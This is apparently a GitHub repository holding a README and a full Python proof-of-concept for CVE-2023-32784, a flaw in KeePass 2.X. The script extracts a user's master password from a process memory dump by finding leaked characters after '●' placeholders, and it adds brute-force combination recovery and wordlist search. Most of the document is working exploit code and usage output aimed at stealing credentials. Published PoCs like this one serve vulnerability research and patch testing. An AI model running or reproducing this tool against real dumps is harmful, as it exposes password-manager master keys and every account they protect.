├── assets
    ├── combos.png
    ├── skip.png
    ├── example.png
    ├── wordlist.png
    └── wordsearch.png
├── README.md
└── keepass_dump.py


/assets/combos.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/z-jxy/keepass_dump/HEAD/assets/combos.png


--------------------------------------------------------------------------------
/assets/skip.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/z-jxy/keepass_dump/HEAD/assets/skip.png


--------------------------------------------------------------------------------
/assets/example.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/z-jxy/keepass_dump/HEAD/assets/example.png


--------------------------------------------------------------------------------
/assets/wordlist.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/z-jxy/keepass_dump/HEAD/assets/wordlist.png


--------------------------------------------------------------------------------
/assets/wordsearch.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/z-jxy/keepass_dump/HEAD/assets/wordsearch.png


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Keepass-Dumper

This is my PoC implementation for [CVE-2023-32784](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32784)

My version is a Python port of [@vdohney's PoC](https://github.com/vdohney/keepass-password-dumper) along with a few changes and additional features.

## Changes

#

One change is the use of known strings found within the dump file to jump more accurately to the location of the masterkey characters. This results in fewer false-positive characters and greatly reduces the time it takes to scan the file. If the strings aren't found in the dump file, the scan starts from the beginning. Jump points are used by default; if you want to do a full scan instead, you can use `--full-scan`. For these cases, I've also added a `--skip` flag to help speed up the scan. It offsets the pointer to jump over the next 1000 bytes, as they typically just contain the same character repeated multiple times. For example, if the character `●e` was found in the dump file, it would appear like the following:

```
●e
●e
●e
●e
●e
●e
●e
●e
●e
●e
●●c
```

Using the `--skip` flag, it's possible to jump over these repeated bytes to help speed up the scan, although this isn't necessary when using the jump points.

```
[*] 15567777 | Found: ●e
[*] 15568797 | Found: ●e
[*] 15570355 | Found: ●●c
[*] 15571375 | Found: ●●c
[*] 15572925 | Found: ●●●r
[*] 15573973 | Found: ●●●r
```

![alt text](assets/skip.png)

## Features

#

This version includes recovery functionality that attempts to find any remaining unknown characters of the key. It does this by searching the dump for the different possible combinations of the characters found. If a match is found, the remaining characters are pulled from the dump until the next character outside the printable ASCII range is reached.

This works if the **full** plaintext password is stored within the dump file (this seems to happen when the user displays the masterkey by deactivating hiding using asterisks).

You can enable this behavior using the `--recover` flag.
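
The recovery idea described above can be sketched roughly as follows. This is a minimal illustration, not the script's actual code: `extend_match`, `is_printable`, the `max_len` cap, and the sample `dump` bytes are all made up for this example, and it assumes the plaintext password sits in the dump as single-byte printable ASCII.

```python
from typing import Optional


def is_printable(byte: int) -> bool:
    """True for bytes in the printable ASCII range (0x20-0x7E)."""
    return 0x20 <= byte <= 0x7E


def extend_match(dump: bytes, candidate: str, max_len: int = 99) -> Optional[str]:
    """Find `candidate` in `dump` and grow it left and right over printable bytes.

    Returns the extended string, or None if the candidate is not in the dump.
    `max_len` is a hypothetical cap on the total length of the result.
    """
    start = dump.find(candidate.encode())
    if start == -1:
        return None
    end = start + len(candidate)
    # Walk left until a non-printable byte or the start of the dump.
    while start > 0 and is_printable(dump[start - 1]) and end - start < max_len:
        start -= 1
    # Walk right until a non-printable byte or the end of the dump.
    while end < len(dump) and is_printable(dump[end]) and end - start < max_len:
        end += 1
    return dump[start:end].decode("ascii")


# Made-up sample: only the fragment "asterPassword" is known up front.
dump = b"\x00\x01MyMasterPassword123!\x00\xff"
print(extend_match(dump, "asterPassword"))  # MyMasterPassword123!
```

If the candidate never appears in plaintext, the function returns `None`, which corresponds to the case where the combinations can only be exported rather than verified.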

![alt text](assets/example.png)

#

You can also specify an output file using `-o` to export the different combinations found. Here you can see that, even in a case where characters for another masterkey were found and the plaintext password was not stored in the dump, the combo list still yields **23/24** characters of the key in the final combination found below.

![alt text](assets/combos.png)

In this case, the first entry also shows `4/5` characters of the second key, `ducks`, which was inside the dump as well. However, it was paired together with the characters of the other key, resulting in `ucks`|`tMasterPassword123!`. There seems to be a potential workaround for this, but it's still a WIP.

#

I've also added the ability to search for potential passwords inside the dump file by providing a wordlist with `-w`. This flag generates strings containing characters from the words in the list and searches for them within the dump file. You can also specify padding for the generated strings using the `-p` or `--padding` flag.

Example: `--padding 2` => ●●a | `--padding 3` => ●●●a

![alt text](assets/wordlist.png)

For the example above, the password was stored in plaintext within the dump, so it was possible to match the string found and pull the additional characters. However, even when the password is not stored in plaintext within the dump, it's still possible to extract the remaining characters:

![alt text](assets/wordsearch.png)

In this case, even though it wasn't able to find a plaintext match in the dump, it was still able to extract all the additional characters.
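
As a rough illustration of the wordlist search described above, the sketch below builds the padded `●` patterns for a single word and looks for them in a dump as UTF-16-LE byte strings. The helper names (`build_patterns`, `find_patterns`) and the sample bytes are made up for this example, and it simplifies what the script does with the matches afterwards.

```python
BULLET = "\u25cf"  # the ● placeholder character


def build_patterns(word: str, padding: int = 0) -> list[str]:
    """One pattern per character: (index + padding) bullets followed by that character."""
    return [BULLET * (i + padding) + ch for i, ch in enumerate(word)]


def find_patterns(dump: bytes, patterns: list[str]) -> dict[str, int]:
    """Map each pattern present in the dump to its first byte offset (UTF-16-LE encoded)."""
    hits = {}
    for pattern in patterns:
        offset = dump.find(pattern.encode("utf-16-le"))
        if offset != -1:
            hits[pattern] = offset
    return hits


patterns = build_patterns("abc", padding=2)
print(patterns)  # ['●●a', '●●●b', '●●●●c']

# Made-up dump that contains only the pattern for the second character.
dump = b"\x00" * 4 + "●●●b".encode("utf-16-le") + b"\x00" * 4
print(find_patterns(dump, patterns))  # {'●●●b': 4}
```

The padding value controls how many leading `●` characters each pattern starts with, matching the `--padding 2` => ●●a example above.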

## References

#

Credit to [@vdohney](https://github.com/vdohney), who originally discovered this vulnerability. Their project is [here](https://github.com/vdohney/keepass-password-dumper).

CVE details: [CVE-2023-32784](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32784)


--------------------------------------------------------------------------------
/keepass_dump.py:
--------------------------------------------------------------------------------
import argparse
from collections import deque, OrderedDict


def get_args():
    parser = argparse.ArgumentParser(
        description="Tool for extracting masterkey from a KeePass 2.X dump. (CVE-2023-32784)"
    )
    parser.add_argument(
        "--recover",
        action="store_true",
        default=False,
        help="Attempts to recover any remaining unknown characters using combinations of the found characters",
    )
    parser.add_argument(
        "-f", "--file", required=True, help="Path to the KeePass 2.X dump file"
    )
    parser.add_argument("-w", "--wordlist", help="Scan the dumpfile against a wordlist")
    parser.add_argument(
        "--skip",
        default=False,
        action="store_true",
        help="Attempt to jump to the next ● character (Useful for large files but may miss characters)",
    )
    parser.add_argument(
        "--set-skip",
        type=int,
        help="Change the number of bytes to skip when using --skip (default: 999)",
    )
    parser.add_argument(
        "--full-scan",
        action="store_true",
        default=False,
        help="Full dump scan (slower but may find more characters)",
    )

    parser.add_argument(
        "-p",
        "--padding",
        default=0,
        type=int,
        help="Padding for wordlist search. (Ex: --padding 2 => ●●a | --padding 3 => ●●●a)",
    )

    parser.add_argument(
        "-o", "--output", help="Output file to write masterkey combinations to"
    )
    parser.add_argument(
        "--debug", action="store_true", default=False, help="Print debug information"
    )
    return parser.parse_args()


class KeePassDump:
    def __init__(self, args):
        self.args = args
        with open(args.file, "rb") as f:
            self.mem_dump = f.read()
        self.size = len(self.mem_dump)

        self.combinations = deque()
        self.found = OrderedDict()
        if args.skip:
            print("[*] Skipping bytes")
            if args.set_skip:
                self._skip = args.set_skip
            else:
                self._skip = 999
        else:
            self._skip = 0

    def DumpPasswords(self):
        print("[*] Searching for masterkey characters")
        chars = self.dump_pw_chars()
        if chars:
            print(f"[*] Extracted: {{UNKNOWN}}{chars}")
            if self.args.recover:
                combos = get_word_combinations(chars, deque())
                for c in combos:
                    masterKey, found = self.recover(c)
                    if found:
                        print(f"[+] masterKey: {masterKey}")
                if self.args.output:
                    with open(self.args.output, "w") as f:
                        f.write("\n".join(combos) + "\n")
                    print(f"[*] Saved {len(combos)} combinations to {self.args.output}")
            return
        else:
            print("[-] couldn't find any characters")

    def WordSearch(self):
        print(f"[*] Searching for masterkey using {self.args.wordlist}")
        wordlist = build_wordlist(self.args)
        searchResults = self.search_dump(wordlist)
        if searchResults:
            for x in searchResults:
                print(f"[+] masterKey: {x}")

    def dump_pw_chars(self) -> str:
        current_len = 0
        dbg_str = deque()
        found = OrderedDict()
        if self.args.full_scan:
            print("[*] Full scan... This may take a few seconds.")
            return self._full_scan(current_len, dbg_str, found)
        else:
            idx, endSearch = self.__get_jump_points()

        mem = self.mem_dump
        since_last_char = 0
        while idx < endSearch:
            # stop searching if we haven't found anything else to reduce false positives
            if found and since_last_char > 10000000:
                if self.args.debug:
                    print("[*] 10000000 bytes since last found. Ending scan.")
                break
            if isAsterisk(mem[idx], mem[idx + 1]):
                # each ● (UTF-16-LE) increases the position of the next character
                current_len += 1
                dbg_str.append("●")
                idx += 1
            elif current_len != 0:
                if isAscii(mem, idx):
                    # record the candidate character for this position
                    if current_len not in found:
                        found[current_len] = bytes([mem[idx]])
                    elif mem[idx] not in found[current_len]:
                        found[current_len] += bytes([mem[idx]])

                    if self.args.debug:
                        print(
                            f"[*] {idx} | Found: {''.join(dbg_str)}{bytes([mem[idx]]).decode()}"
                        )
                    since_last_char = 0
                    idx += self._skip
                current_len = 0
                dbg_str.clear()
            idx += 1
            since_last_char += 1
        return self.display(found)

    def _full_scan(self, current_len, dbg_str, found):
        current_len = 0
        dbg_str = deque()
        found = OrderedDict()

        # stop one byte early: the loop reads mem[idx + 1]
        idx, endSearch = 0, self.size - 1

        mem = self.mem_dump
        while idx < endSearch:
            if isAsterisk(mem[idx], mem[idx + 1]):
                current_len += 1
                dbg_str.append("●")
                idx += 1
            elif current_len != 0:
                if isAscii(mem, idx):
                    if current_len not in found:
                        found[current_len] = bytes([mem[idx]])
                    elif mem[idx] not in found[current_len]:
                        found[current_len] += bytes([mem[idx]])

                    if self.args.debug:
                        print(
                            f"[*] {idx} | Found: {''.join(dbg_str)}{bytes([mem[idx]]).decode()}"
                        )
                    idx += self._skip
                current_len = 0
                dbg_str.clear()
            idx += 1
        return self.display(found)

    def display(self, found: OrderedDict) -> str:
        chars = []
        print("[*] 0:\t{UNKNOWN}")
        for key, val in found.items():
            print(f"[*] {key}:", end="\t")
            if len(val) > 1:
                # several candidates for one position are shown as <{a, b}>
                candidates = b"<{" + b", ".join([bytes([c]) for c in val]) + b"}>"
            else:
                candidates = val
            data = candidates.decode()
            print(data)
            chars.append(data)
        return "".join(chars)

    def recover(self, search_word: str, collected=None) -> tuple[str, bool]:
        print("[?] Recovering...")

        if not collected:
            collected = deque([c for c in search_word])

        key, success = self.extract_and_search(search_word, collected)
        if success:
            return key, success

        return "", False

    def extract_and_search(self, char: str, collected_key_chars: deque):
        idx = self.mem_dump.find(char.encode())
        if idx != -1:
            print(f"[*] Found match in dump for: {char}")
            key, found_ct = self.__extract_chars(idx, len(char), collected_key_chars)
            if found_ct != 0 and self.mem_dump.find(key.encode()) != -1:
                return key, True
            return "", False
        print(f"[-] Couldn't verify plaintext match in dump for: {char}")
        return "", False

    def search_dump(self, wordlist: dict[str, deque]) -> list[str]:
        results = {}

        for idx, (word, patterns) in enumerate(wordlist.items()):
            print(f"[*] ({idx + 1}/{len(wordlist.keys())}): {word}")
            collected, success = self._pattern_search(patterns.copy())
            if success:
                char = "".join(collected).replace("●", "")
                print(f"[*] Found string: {char}")
                key, success = self.recover(char, collected)
                if success:
                    results[word] = key
            else:
                print(f"[-] no matches found for: {word}")

        return list(set(results.values()))

    def _char_search_left(self, patterns: deque, collected: OrderedDict) -> deque:
        if not patterns:
            return deque(sorted(set(collected.values())))

        target_char = patterns.pop()
        target_idx = self.mem_dump.find(target_char.encode("utf-16-le"))

        if target_idx != -1:
            collected[target_idx] = target_char
            if self.args.debug:
                print(f"[*] Match for: {target_char}")
            if target_idx - 2600 > 0:
                mem = self.mem_dump
                dbg_str = deque(maxlen=100)
                for i in range(1, 2500):
                    idx = target_idx - 2500 - i
                    if isAscii(mem, idx):
                        for y in range(1, 99, 2):
                            if isAsterisk(mem[idx - y - 1], mem[idx - y]):
                                dbg_str.append("●")
                            elif dbg_str:
                                char = mem[idx : idx + 1].decode()
                                self.__search_callback(
                                    idx, char, dbg_str, collected, patterns
                                )
                                break
                        dbg_str.clear()
        return self._char_search_left(patterns, collected)

    def _char_search_right(self, patterns: deque, collected: OrderedDict) -> deque:
        if not patterns:
            return deque(sorted(set(collected.values())))

        target_char = patterns.popleft()
        target_idx = self.mem_dump.find(target_char.encode("utf-16-le"))
        mem = self.mem_dump

        if target_idx != -1:
            collected[target_idx] = target_char
            if self.args.debug:
                print(f"[*] Match for: {target_char}")
            if target_idx - 2600 > 0:
                mem = self.mem_dump
                dbg_str = deque(maxlen=100)
                for i in range(1, 2500):
                    idx = target_idx + 2500 + i
                    if isAsterisk(mem[idx + 1], mem[idx + i + 1]):
                        dbg_str.append("●" * len(target_char))
                    if dbg_str:
                        for y in range(1, 99, 2):
                            if isAscii(mem, idx + y):
                                char = mem[idx + y : idx + y + 1].decode()
                                self.__search_callback(
                                    idx, char, dbg_str, collected, patterns
                                )
                                break
                        break
        return self._char_search_right(patterns, collected)

    def _pattern_search(self, patterns: deque):
        collected = deque()
        # copy so we can use the original pattern in both searches
        _left_chars = self._char_search_left(patterns.copy(), OrderedDict())
        _right_chars = self._char_search_right(patterns.copy(), OrderedDict())

        if not _left_chars and not _right_chars:
            return collected, False

        # merge collected characters
        for i in range(len(_left_chars)):
            if _left_chars[i] not in _right_chars:
                _right_chars.insert(i, _left_chars[i])

        collected.extend(_right_chars)
        return collected, True

    def __search_callback(self, idx, char, dbg_str, collected, patterns):
        dbg_str = f'{"".join(dbg_str)}{char}'
        if dbg_str not in collected.values():
            collected[idx] = dbg_str
            if dbg_str not in patterns:
                if self.args.debug:
                    print(f"[*] Match for: {char}")
                patterns.append(dbg_str)

    def __extract_chars(self, start: int, chars_len: int, collected) -> tuple[str, int]:
        """Extracts the remaining characters of the masterkey from the dump if they're stored in plaintext by being displayed within the application"""
        print("[*] Extracted chars:", end="\t")
        mem = self.mem_dump

        init_len = len(collected)
        last_len = init_len

        # walk left over printable ASCII bytes
        for i in range(1, 99 - chars_len):  # 99 => max length for masterkey
            if start - i < 0 or not 0x20 <= mem[start - i] <= 0x7E:
                break
            collected.appendleft(chr(mem[start - i]))

        print("{ ", end="")

        if len(collected) == last_len:
            print("(none)", end="")
        else:
            for x in range(len(collected) - last_len):
                print(collected[x], end="")

        print(" <- -> ", end="")

        last_len = len(collected)

        # walk right over printable ASCII bytes
        for i in range(99 - chars_len):
            pos = start + chars_len + i
            if pos >= self.size or not 0x20 <= mem[pos] <= 0x7E:
                if len(collected) == last_len:
                    print("(none)", end="")
                break
            char = chr(mem[pos])
            print(char, end="")
            collected.append(char)

        print(" }")

        if len(collected) == init_len:
            print("[-] No new chars found")
            return "".join(collected).replace("●", ""), 0

        return "".join(collected).replace("●", ""), len(collected) - init_len

    def __get_jump_points(self) -> tuple[int, int]:
        try:
            i = self.mem_dump.index(b"(Multiple values)")
            endSearch = self.mem_dump.rindex(b"(Multiple values)")
            if i != endSearch:
                print("[*] Using jump points")
                return i, endSearch
            print("Only one jump point found. Scanning with slower method.")
            return 0, len(self.mem_dump) - 1
        except ValueError:
            print("[-] Couldn't find jump points in file. Scanning with slower method.")
            return 0, len(self.mem_dump) - 1


def isAscii(mem_dump, idx) -> bool:
    # printable ASCII character stored as UTF-16-LE (low byte, then 0x00)
    return 0x20 <= mem_dump[idx] <= 0x7E and mem_dump[idx + 1] == 0x00


def isAsterisk(x, y) -> bool:
    # ● (U+25CF) encoded as UTF-16-LE
    return x == 0xCF and y == 0x25


def get_word_combinations(chars, combinations, current="") -> deque:
    if not chars:
        combinations.append(current)
        return combinations

    if chars.startswith("<{") and "}>" in chars:
        opening_idx = chars.index("<{")
        closing_idx = chars.index("}>")
        options = chars[opening_idx + 2 : closing_idx].split(", ")
        for option in options:
            get_word_combinations(
                chars[closing_idx + 2 :], combinations, current + option
            )
    else:
        get_word_combinations(chars[1:], combinations, current + chars[0])

    return combinations


def build_wordlist(args) -> dict[str, deque]:
    with open(args.wordlist, "r") as f:
        wordlist = [line.strip() for line in f.readlines()]

    candidates: dict[str, deque] = {}

    for word in wordlist:
        candidates[word] = deque(
            [f"{'●' * (x + args.padding)}{word[x]}" for x in range(len(word))]
        )
    return candidates


def main(args):
    kpd = KeePassDump(args)

    if args.wordlist:
        kpd.WordSearch()
    else:
        kpd.DumpPasswords()


if __name__ == "__main__":
    main(get_args())

--------------------------------------------------------------------------------